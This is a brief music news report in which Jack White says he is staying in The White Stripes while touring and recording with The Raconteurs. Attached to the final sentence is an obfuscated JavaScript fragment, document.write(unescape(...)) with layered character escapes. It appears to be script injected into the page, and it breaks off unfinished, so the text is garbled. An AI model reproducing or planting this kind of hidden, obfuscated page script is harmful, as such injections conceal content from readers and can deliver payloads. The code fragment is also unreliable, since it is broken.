Jack White has reassured fans of The White Stripes that he has no intention of quitting the band.
The future of the duo has been put into doubt since White started touring with his new band The Raconteurs.
Their debut album 'Broken Boy Soldiers' is released on May 15, and White will be on the road with the band for most of the year promoting the LP.
But the star plans to head into the studio with his White Stripes bandmate Meg White in the near future.
But he told The Evening Echo: "I'm having a slight break from The White Stripes but not too much.
"I've already got a lot of songs for our next record, so when I find two minutes to record it I will."
The White Stripes famously recorded their last two albums - 2003's 'Elephant' and 2005's 'Get Behind Me Satan' - in just a fortnight.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
